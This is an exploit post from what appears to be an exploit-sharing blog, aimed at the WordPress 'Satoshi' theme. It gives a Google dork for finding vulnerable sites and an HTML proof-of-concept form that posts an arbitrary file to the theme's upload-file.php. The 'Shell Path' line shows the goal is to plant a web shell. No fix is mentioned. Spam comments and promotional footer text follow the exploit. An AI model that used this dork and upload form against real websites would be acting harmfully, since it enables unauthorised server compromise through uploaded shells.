Satoshi Theme - File Upload CSRF



#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here

3xploi7 Team

2 Responses to "Satoshi Theme - File Upload CSRF"

  1. HTML Pro Team has got an extensive expertise in PSD To Joomla Theme Conversion with the ability to work on Joomla plug-in development and customization, Shopping Cart Plug-ins, Commercial Plug-in Implementations, Display Compatibility and Schema with Load Page Speed Optimization and all you can think a Joomla based site can do. If you’re looking to build a Joomla website in a hurry/jiffy and effortlessly – our experts will slice your PSD into HTML then code a Joomla theme for your next project with 100% satisfaction!

    BalasHapus
  2. A brothel in Cologne, Germany is offering any patron who gets a tattoo of the businesses logo, by their in house artist, free entrance for life ($6.25 US) and discounts on lap dances ($25.00 US. ea)
    kit tattoo

    BalasHapus

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel


Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya

Simak Update Artikel menarik disini, Stay toon !! 3xploi7.com
Jangan sampai Terlewatkan.
 • Join Grup Team : 

 • Update Konten Unik Lainnya di : 
 Instagram
— Twitter

 • Tonton video kami di : 

 Youtube